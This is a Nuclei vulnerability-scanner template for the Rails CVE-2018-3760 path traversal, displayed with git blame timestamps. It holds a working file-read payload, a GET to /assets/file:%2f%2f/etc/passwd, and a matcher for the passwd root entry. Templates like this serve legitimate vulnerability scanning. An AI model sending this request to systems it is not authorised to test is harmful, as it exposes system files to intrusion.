nuclei-templates/cves/2018/CVE-2018-3760.yaml

23 lines
386 B
YAML
Raw Normal View History

2021-01-02 05:00:39 +00:00
id: CVE-2018-3760
2020-04-05 18:01:09 +00:00
info:
2021-01-02 05:00:39 +00:00
name: Rails CVE-2018-3760
2020-04-05 18:01:09 +00:00
author: 0xrudra
severity: high
2021-03-18 07:54:36 +00:00
tags: cve,cve2018,rails,lfi
2020-04-05 18:01:09 +00:00
requests:
- method: GET
path:
- "{{BaseURL}}/assets/file:%2f%2f/etc/passwd"
2021-03-18 07:54:36 +00:00
matchers-condition: and
2020-04-05 18:01:09 +00:00
matchers:
- type: status
status:
2020-05-25 07:49:06 +00:00
- 200
2020-04-05 18:01:09 +00:00
- type: regex
regex:
2020-05-25 07:49:06 +00:00
- "root:[x*]:0:0:"
2020-04-05 18:01:09 +00:00
part: body